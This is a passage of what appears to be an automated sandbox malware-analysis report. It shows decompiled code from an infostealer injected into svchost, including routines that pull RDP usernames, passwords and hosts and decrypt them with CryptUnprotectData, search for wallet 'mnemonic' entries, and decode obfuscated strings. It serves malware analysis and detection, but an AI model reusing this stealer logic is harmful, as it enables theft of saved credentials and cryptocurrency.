                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CreateFileLocal$AddressAllocChangeCloseFindFreeHandleModuleNotificationProclstrcpy
                                                                                                                                        • String ID: <POP3_Password2
                                                                                                                                        • API String ID: 2805146493-2923094552
                                                                                                                                        • Opcode ID: 5fbb4425b2fe108d95a7af76478cd8cff3fe5665ba6f6013d26689a87573e5fe
                                                                                                                                        • Instruction ID: bc695bacf5d6d301d9fe18af4c577a8cedf393528a35cf4ab36cd8c0a99cdf0b
                                                                                                                                        • Opcode Fuzzy Hash: 5fbb4425b2fe108d95a7af76478cd8cff3fe5665ba6f6013d26689a87573e5fe
                                                                                                                                        • Instruction Fuzzy Hash: 51413B35931209EFDF11ABA8D886AEDBBF5EF15250F144025E901B62D0DF71AA41EFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        Function 0BC072B4, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 89stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                        			E0BC072B4(void* __eflags, intOrPtr _a4, CHAR* _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				CHAR* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				void* __esi;
				void* _t23;
				void* _t25;
				intOrPtr _t31;
				void* _t39;
				CHAR* _t43;
				void* _t45;
				unsigned int _t48;
				void* _t55;
				void* _t56;

				_t23 = E0BC08FF4( &_v48, _a8);
				if(_t23 == 0) {
					return _t23;
				}
				_t47 = _v36;
				if(_v36 >= 0x100000) {
					L10:
					return E0BC0907F( &_v48);
				}
				_t52 = _v40;
				_t25 = E0BC0909F(_v40, _t47);
				_pop(_t45);
				if(_t25 != 0) {
					goto L10;
				}
				_v12 = E0BC071FA(_t47, "username:s:", _t52);
				_t43 = E0BC071FA(_t47, "password 51:b:", _t52);
				_t31 = E0BC071FA(_t47, "full address:s:", _t52);
				_t56 = _t55 + 0x18;
				_v16 = _t31;
				if(_v12 != 0 && _t43 != 0 && _t31 != 0) {
					_t48 = lstrlenA(_t43);
					E0BC09C7F(_t45, _t43, _t48);
					_v32 = _t48 >> 1;
					_v28 = _t43;
					_v20 = 0;
					_t39 = E0BC01000( &_v32, 0,  &_v24);
					_t56 = _t56 + 0x10;
					if(_t39 != 0) {
						_t66 = _v20;
						if(_v20 != 0) {
							E0BC07121(_a4, _t66, _v12, _v16, _v20, _v24);
							_t56 = _t56 + 0x10;
							LocalFree(_v20);
						}
					}
				}
				E0BC08D3D(_v12);
				E0BC08D3D(_t43);
				E0BC08D3D(_v16);
				goto L10;
			}






















                                                                                                                                        0x0bc072c3
                                                                                                                                        0x0bc072cb
                                                                                                                                        0x0bc073b1
                                                                                                                                        0x0bc073b1
                                                                                                                                        0x0bc072d1
                                                                                                                                        0x0bc072da
                                                                                                                                        0x0bc073a5
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc073a8
                                                                                                                                        0x0bc072e0
                                                                                                                                        0x0bc072e6
                                                                                                                                        0x0bc072eb
                                                                                                                                        0x0bc072ee
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc07301
                                                                                                                                        0x0bc07311
                                                                                                                                        0x0bc0731b
                                                                                                                                        0x0bc07320
                                                                                                                                        0x0bc07327
                                                                                                                                        0x0bc0732a
                                                                                                                                        0x0bc0733b
                                                                                                                                        0x0bc07340
                                                                                                                                        0x0bc07352
                                                                                                                                        0x0bc07355
                                                                                                                                        0x0bc07358
                                                                                                                                        0x0bc0735b
                                                                                                                                        0x0bc07360
                                                                                                                                        0x0bc07365
                                                                                                                                        0x0bc07367
                                                                                                                                        0x0bc0736a
                                                                                                                                        0x0bc0737b
                                                                                                                                        0x0bc07380
                                                                                                                                        0x0bc07386
                                                                                                                                        0x0bc07386
                                                                                                                                        0x0bc0736a
                                                                                                                                        0x0bc07365
                                                                                                                                        0x0bc0738f
                                                                                                                                        0x0bc07395
                                                                                                                                        0x0bc0739d
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08FF4: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000010,00000000,?,?,0BC01F2C,00000000), ref: 0BC09013
                                                                                                                                          • Part of subcall function 0BC0909F: LocalAlloc.KERNEL32(00000040,0000008C,00000000,?,?,0BC01F45,00100000), ref: 0BC090D5
                                                                                                                                          • Part of subcall function 0BC071FA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC07220
                                                                                                                                          • Part of subcall function 0BC071FA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0BC0723C
                                                                                                                                          • Part of subcall function 0BC071FA: StrStrIA.SHLWAPI(?,?,?,00000000,00000000,00000000,00000000), ref: 0BC07259
                                                                                                                                          • Part of subcall function 0BC071FA: lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0726F
                                                                                                                                          • Part of subcall function 0BC071FA: lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0728B
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0BC07335
                                                                                                                                          • Part of subcall function 0BC01000: LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
                                                                                                                                          • Part of subcall function 0BC01000: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,0BC0D7EC), ref: 0BC0717E
                                                                                                                                          • Part of subcall function 0BC07121: lstrlenA.KERNEL32(TERMSRV//), ref: 0BC0718A
                                                                                                                                          • Part of subcall function 0BC07121: StrStrIA.SHLWAPI(?,TERMSRV//), ref: 0BC07197
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 0BC07386
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$ByteCharLocalMultiWide$AddressAllocCreateFileFreeLibraryLoadProc
                                                                                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                                                                                        • API String ID: 1965316502-2945746679
                                                                                                                                        • Opcode ID: a1cda70f9473d2094ad604f226658dcf67bd14e9d073f1ae216fbca6c58dc355
                                                                                                                                        • Instruction ID: e8d559627dc860c27dfa6e0824a4c04a1658281a1cd91554da69c06dca81ab5f
                                                                                                                                        • Opcode Fuzzy Hash: a1cda70f9473d2094ad604f226658dcf67bd14e9d073f1ae216fbca6c58dc355
                                                                                                                                        • Instruction Fuzzy Hash: 2421B672E302166FDF00ABA5DC41AAFBBB9EF44240F048566E904B31D1EF709E119BB0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.12%

                                                                                                                                        Function 0BC071FA, Relevance: 7.6, APIs: 5, Instructions: 84stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC071FA(unsigned int __eax, char* _a4, short* _a8) {
				int _v8;
				int _v12;
				int _v16;
				int _t20;
				char* _t24;
				char* _t26;
				CHAR* _t28;
				int _t36;
				CHAR* _t41;

				_t20 = __eax >> 1;
				_v8 = 0;
				_v12 = 0;
				_v16 = _t20;
				_t36 = WideCharToMultiByte(0, 0, _a8, _t20, 0, 0, 0, 0);
				if(_t36 == 0) {
					L11:
					E0BC08D3D(_v8);
					return _v12;
				}
				_t24 = E0BC08D51(_t21);
				_v8 = _t24;
				if(WideCharToMultiByte(0, 0, _a8, _v16, _t24, _t36, 0, 0) == 0) {
					E0BC08D3D(_v8);
					_v8 = 0;
				}
				if(_v8 != 0) {
					_t26 = StrStrIA(_v8, _a4);
					_v16 = _t26;
					if(_t26 == 0) {
						goto L11;
					}
					_t41 = lstrlenA(_a4) + _v16;
					_t28 = _t41;
					if( *_t41 == 0) {
						goto L11;
					}
					while( *_t28 != 0xd) {
						_t28 =  &(_t28[1]);
						if( *_t28 != 0) {
							continue;
						}
						goto L11;
					}
					 *_t28 = 0;
					_t38 = lstrlenA(_t41);
					if(_t29 != 0) {
						_v12 = E0BC08D51(_t29);
						E0BC08D91(_t41, _t30, _t38);
					}
				}
			}












                                                                                                                                        0x0bc0720f
                                                                                                                                        0x0bc07215
                                                                                                                                        0x0bc0721a
                                                                                                                                        0x0bc0721d
                                                                                                                                        0x0bc07222
                                                                                                                                        0x0bc07226
                                                                                                                                        0x0bc072a3
                                                                                                                                        0x0bc072a6
                                                                                                                                        0x0bc072b3
                                                                                                                                        0x0bc072b3
                                                                                                                                        0x0bc07228
                                                                                                                                        0x0bc07234
                                                                                                                                        0x0bc07240
                                                                                                                                        0x0bc07245
                                                                                                                                        0x0bc0724b
                                                                                                                                        0x0bc0724b
                                                                                                                                        0x0bc07251
                                                                                                                                        0x0bc07259
                                                                                                                                        0x0bc0725f
                                                                                                                                        0x0bc07264
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc07273
                                                                                                                                        0x0bc07276
                                                                                                                                        0x0bc0727a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0727c
                                                                                                                                        0x0bc07281
                                                                                                                                        0x0bc07284
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc07286
                                                                                                                                        0x0bc07289
                                                                                                                                        0x0bc0728d
                                                                                                                                        0x0bc07291
                                                                                                                                        0x0bc0729b
                                                                                                                                        0x0bc0729e
                                                                                                                                        0x0bc0729e
                                                                                                                                        0x0bc07291

                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC07220
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0BC0723C
                                                                                                                                        • StrStrIA.SHLWAPI(?,?,?,00000000,00000000,00000000,00000000), ref: 0BC07259
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0728B
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0BC0726F
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocalMultiWidelstrlen$AddressAllocFreeHandleModuleProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1974053379-0
                                                                                                                                        • Opcode ID: 4daa7f1df09827018cec58ab15cfada623b21739e59c63263bdf5c7e205b6af3
                                                                                                                                        • Instruction ID: e88afd5a0b9b123cc95821fec6da563d1497900a729b34cf089a59e95256be6d
                                                                                                                                        • Opcode Fuzzy Hash: 4daa7f1df09827018cec58ab15cfada623b21739e59c63263bdf5c7e205b6af3
                                                                                                                                        • Instruction Fuzzy Hash: E8214FB1C21259FFEF01AFA4DC818AEBBBDEE45254B158167F900A3150DA319F409B60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 0BC075B0, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                        			E0BC075B0(intOrPtr _a8, intOrPtr _a12, int _a16) {
				char _v8;
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t20;
				CHAR* _t27;
				void* _t32;
				CHAR* _t35;
				void* _t40;
				void* _t41;
				void* _t43;
				intOrPtr _t48;
				void* _t51;

				if(_a16 != 0) {
					_t20 =  *0xbc10d60; // 0x1
					if(_t20 < _a16) {
						_t48 =  *0xbc10d40; // 0x5
						if(_t48 < _a16) {
							E0BC0326D(_t20,  &_v12,  &_v8,  &_a16, _a12);
							E0BC0326D(_t48,  &_v16,  &_v12,  &_v8, _a12);
							_t40 = _t51;
							_t20 = lstrcmpW(_a16, L"mnemonic");
							if(_t20 == 0) {
								_a16 = 0xbeef0000;
								E0BC08A41( &_a16, _t40, _a8, 4);
								_t41 = _t32;
								_t34 = "mnemonic";
								_a16 = lstrlenA("mnemonic");
								E0BC08C37(_t25);
								if(_a16 != 0) {
									E0BC08C4D(_t34, _t41, _a16);
									_pop(_t41);
								}
								_t27 = E0BC09BE0(_t41, _v8, 0xffffffff);
								_pop(_t43);
								_t35 = _t27;
								_t56 = lstrlenA(_t35);
								_t20 = E0BC08C37(_t28);
								if(_t28 != 0 && _t35 != 0) {
									_t20 = E0BC08C4D(_t35, _t43, _t56);
								}
							}
						}
						return _t20;
					}
				}
				return _t20;
			}


















                                                                                                                                        0x0bc075ba
                                                                                                                                        0x0bc075c0
                                                                                                                                        0x0bc075c8
                                                                                                                                        0x0bc075cf
                                                                                                                                        0x0bc075d8
                                                                                                                                        0x0bc075eb
                                                                                                                                        0x0bc075fe
                                                                                                                                        0x0bc07604
                                                                                                                                        0x0bc0760d
                                                                                                                                        0x0bc07615
                                                                                                                                        0x0bc07620
                                                                                                                                        0x0bc07627
                                                                                                                                        0x0bc07632
                                                                                                                                        0x0bc07633
                                                                                                                                        0x0bc0763b
                                                                                                                                        0x0bc0763e
                                                                                                                                        0x0bc07647
                                                                                                                                        0x0bc0764e
                                                                                                                                        0x0bc07653
                                                                                                                                        0x0bc07653
                                                                                                                                        0x0bc07659
                                                                                                                                        0x0bc0765f
                                                                                                                                        0x0bc07660
                                                                                                                                        0x0bc07665
                                                                                                                                        0x0bc07667
                                                                                                                                        0x0bc0766e
                                                                                                                                        0x0bc07677
                                                                                                                                        0x0bc0767c
                                                                                                                                        0x0bc0767d
                                                                                                                                        0x0bc0767e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0767f
                                                                                                                                        0x0bc075c8
                                                                                                                                        0x0bc07681

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpW.KERNEL32(00000000,mnemonic), ref: 0BC0760D
                                                                                                                                        • lstrlenA.KERNEL32(mnemonic), ref: 0BC07639
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0BC07663
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcmp
                                                                                                                                        • String ID: mnemonic$mnemonic
                                                                                                                                        • API String ID: 3065309983-891895871
                                                                                                                                        • Opcode ID: b7860eb1710e3914a8ede1e57b2e12a81fe6cb24b07cd8f3631908e18e57d8c7
                                                                                                                                        • Instruction ID: f1095214859dbb207f75e89477d2a7e2fe26f40112c0c63ee07a2ffb5178bf28
                                                                                                                                        • Opcode Fuzzy Hash: b7860eb1710e3914a8ede1e57b2e12a81fe6cb24b07cd8f3631908e18e57d8c7
                                                                                                                                        • Instruction Fuzzy Hash: BC217931A3524A9FCF04AF68E941A9E37A5EF00354F100916E902A31D1EE70BE59DB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        Function 0BC088C9, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 58stringmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			E0BC088C9(CHAR* __edi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* __esi;
				signed int _t23;
				CHAR* _t31;
				void* _t32;
				void* _t35;
				char _t39;
				CHAR* _t41;
				signed int _t42;

				_t40 = __edi;
				_t23 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t23 ^ _t42;
				_v72 = 0x595f486a;
				_v68 = 0x4e4a7843;
				_v64 = 0x74424b2d;
				_v60 = 0x63495250;
				_v56 = 0x64683331;
				_v52 = 0x566e457a;
				_v48 = 0x44716151;
				_v44 = 0x76366f53;
				_v40 = 0x4f6b6d57;
				_v36 = 0x41707572;
				_v32 = 0x67377334;
				_v28 = 0x38473530;
				_v24 = 0x4c6c6946;
				_v20 = 0x55665862;
				_v16 = 0x4d795a32;
				_v12 = 0x65395477;
				_t41 = LocalAlloc(0x40, lstrlenA(__edi) + 4);
				lstrcpyA(_t41, __edi);
				if( *_t41 != 0) {
					_t31 = _t41;
					do {
						_t39 =  *_t31;
						_t35 = 0;
						while(1) {
							_t19 = _t35 - 0x44; // 0x595f486a
							if(_t39 ==  *((intOrPtr*)(_t42 + _t19))) {
								break;
							}
							_t35 = _t35 + 1;
							if(_t35 < 0x40) {
								continue;
							} else {
							}
							goto L7;
						}
						_t21 = (_t35 + 0xfffffffe & 0x0000003f) - 0x44; // 0x595f486a
						 *_t31 =  *((intOrPtr*)(_t42 + _t21));
						L7:
						_t31 =  &(_t31[1]);
					} while ( *_t31 != 0);
				}
				return E0BC09FDC(_t41, _t32, _v8 ^ _t42, _t39, _t40, _t41);
			}




























                                                                                                                                        0x0bc088c9
                                                                                                                                        0x0bc088cf
                                                                                                                                        0x0bc088d6
                                                                                                                                        0x0bc088db
                                                                                                                                        0x0bc088e2
                                                                                                                                        0x0bc088e9
                                                                                                                                        0x0bc088f0
                                                                                                                                        0x0bc088f7
                                                                                                                                        0x0bc088fe
                                                                                                                                        0x0bc08905
                                                                                                                                        0x0bc0890c
                                                                                                                                        0x0bc08913
                                                                                                                                        0x0bc0891a
                                                                                                                                        0x0bc08921
                                                                                                                                        0x0bc08928
                                                                                                                                        0x0bc0892f
                                                                                                                                        0x0bc08936
                                                                                                                                        0x0bc0893d
                                                                                                                                        0x0bc08944
                                                                                                                                        0x0bc0895d
                                                                                                                                        0x0bc08961
                                                                                                                                        0x0bc0896a
                                                                                                                                        0x0bc0896c
                                                                                                                                        0x0bc0896e
                                                                                                                                        0x0bc0896e
                                                                                                                                        0x0bc08970
                                                                                                                                        0x0bc08972
                                                                                                                                        0x0bc08972
                                                                                                                                        0x0bc08976
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc08978
                                                                                                                                        0x0bc0897c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0897e
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0897c
                                                                                                                                        0x0bc08986
                                                                                                                                        0x0bc0898a
                                                                                                                                        0x0bc0898c
                                                                                                                                        0x0bc0898c
                                                                                                                                        0x0bc0898d
                                                                                                                                        0x0bc0896e
                                                                                                                                        0x0bc089a0

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC0894B
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000004), ref: 0BC08957
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD), ref: 0BC08961
                                                                                                                                        Strings
                                                                                                                                        • 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD, xrefs: 0BC088DA, 0BC0895F
                                                                                                                                        • jH_YCxJN-KBtPRIc13hdzEnVQaqDSo6vWmkOrupA4s7g05G8FilLbXfU2ZyMwT9e, xrefs: 0BC08972
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocallstrcpylstrlen
                                                                                                                                        • String ID: 6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRD$jH_YCxJN-KBtPRIc13hdzEnVQaqDSo6vWmkOrupA4s7g05G8FilLbXfU2ZyMwT9e
                                                                                                                                        • API String ID: 2705960802-2318978272
                                                                                                                                        • Opcode ID: bb2de43df0006126d47ed42238cc9c7d5346af92d8e8b735a170e25d0ab49776
                                                                                                                                        • Instruction ID: d0c017d7ed493cf2dca4798c82adaf10b3b14336327b066ba882eb3f25a1388d
                                                                                                                                        • Opcode Fuzzy Hash: bb2de43df0006126d47ed42238cc9c7d5346af92d8e8b735a170e25d0ab49776
                                                                                                                                        • Instruction Fuzzy Hash: AD21A1B0C212989FDB059FA5D8553AEBFB4FF06614F65828CE0A26B380D7308A41CF95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC09283, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                        			E0BC09283(intOrPtr* __eax, void* __ecx) {
				void* _v8;
				char _v12;
				void* __esi;
				void** _t9;
				void* _t16;
				void* _t18;
				signed int _t22;
				intOrPtr* _t34;

				_t34 = __eax;
				_t9 =  &_v8;
				_t22 = 0;
				__imp__GetHGlobalFromStream(__eax, _t9);
				if(_t9 < 0) {
					L8:
					return 0;
				}
				_t30 = E0BC089A1(__eax, __ecx);
				if(_t12 < 4) {
					E0BC08B27(_t34);
					goto L8;
				}
				if(GlobalLock(_v8) != 0) {
					_t22 =  !(E0BC0930F(_t15, _t30 + 0xfffffffc));
					GlobalUnlock(_v8);
				}
				_t16 = 0xfffffffc;
				 *((intOrPtr*)( *_t34 + 0x14))(_t34, _t16, 0, 2, 0);
				_v12 = 1;
				_t18 = E0BC08B76( &_v12, _t34);
				if(_v12 == 0 || _t18 != _t22) {
					goto L8;
				} else {
					return 1;
				}
			}











                                                                                                                                        0x0bc0928b
                                                                                                                                        0x0bc0928e
                                                                                                                                        0x0bc09293
                                                                                                                                        0x0bc09295
                                                                                                                                        0x0bc0929d
                                                                                                                                        0x0bc09308
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09308
                                                                                                                                        0x0bc092a6
                                                                                                                                        0x0bc092ab
                                                                                                                                        0x0bc09303
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc09303
                                                                                                                                        0x0bc092b8
                                                                                                                                        0x0bc092cb
                                                                                                                                        0x0bc092cd
                                                                                                                                        0x0bc092cd
                                                                                                                                        0x0bc092d7
                                                                                                                                        0x0bc092e0
                                                                                                                                        0x0bc092ea
                                                                                                                                        0x0bc092ed
                                                                                                                                        0x0bc092f7
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc092fd
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc092fd

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,00000000,?,?,1.00,?,?,00000000,?,0BC0125C), ref: 0BC09295
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC092B0
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,0BC0125C), ref: 0BC092CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLockStreamUnlock
                                                                                                                                        • String ID: 1.00
                                                                                                                                        • API String ID: 2287449323-2728340845
                                                                                                                                        • Opcode ID: 2d5edc186cf389cec12169575de804cb994bcc8c66c23790c1df6217560fbf59
                                                                                                                                        • Instruction ID: 499137286ce53b33d2bee68d2e30469c59f4357d3e9fb5315a5dce0629229ca4
                                                                                                                                        • Opcode Fuzzy Hash: 2d5edc186cf389cec12169575de804cb994bcc8c66c23790c1df6217560fbf59
                                                                                                                                        • Instruction Fuzzy Hash: F401F9727306116FEB106BB8AC49BAF7BE9DFC1220B210225E502E21D1EEB0DE419A51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.60%

                                                                                                                                        Function 0BC09209, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                        			E0BC09209(void* __eax, void* __ebx, void* __ecx) {
				void* _v8;
				void** _t5;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t35;
				signed int _t36;

				_t33 = __eax;
				_t5 =  &_v8;
				_t36 = 0;
				__imp__GetHGlobalFromStream(__eax, _t5, _t32, _t35, __ecx);
				if(_t5 >= 0) {
					_t21 = E0BC089A1(__eax, __ecx);
					if(GlobalLock(_v8) != 0) {
						_t36 = E0BC0930F(_t17, _t21);
						GlobalUnlock(_v8);
					}
				}
				E0BC08B27(_t33);
				return E0BC08C37( !((_t36 & 0x00ff0000 | _t36 >> 0x00000010) >> 0x00000008 | (_t36 & 0x0000ff00 | _t36 << 0x00000010) << 0x00000008));
			}










                                                                                                                                        0x0bc0920f
                                                                                                                                        0x0bc09211
                                                                                                                                        0x0bc09216
                                                                                                                                        0x0bc09218
                                                                                                                                        0x0bc09220
                                                                                                                                        0x0bc0922d
                                                                                                                                        0x0bc09237
                                                                                                                                        0x0bc09245
                                                                                                                                        0x0bc09247
                                                                                                                                        0x0bc09247
                                                                                                                                        0x0bc0924d
                                                                                                                                        0x0bc09250
                                                                                                                                        0x0bc09282

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,00000000,?,?,?,?,0BC0149C,?,?,00000000,?,0BC0125C), ref: 0BC09218
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC0922F
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,0BC0149C,?,?,00000000,?,0BC0125C), ref: 0BC09247
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$FromLockStreamUnlock
                                                                                                                                        • String ID: 1.00
                                                                                                                                        • API String ID: 2287449323-2728340845
                                                                                                                                        • Opcode ID: fa73a0ea2442c4d618cb2dfda6befbc841b1e1a34e4a332f4ee8f0cc4bc3fd71
                                                                                                                                        • Instruction ID: cb3b383ab018b3f0d245f5f7909e22b1c769c83f0945113c6f09f1f9200b7e34
